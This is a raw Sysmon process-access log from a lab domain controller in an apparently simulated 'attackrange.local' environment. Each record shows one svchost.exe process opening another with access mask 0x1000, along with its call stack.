13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 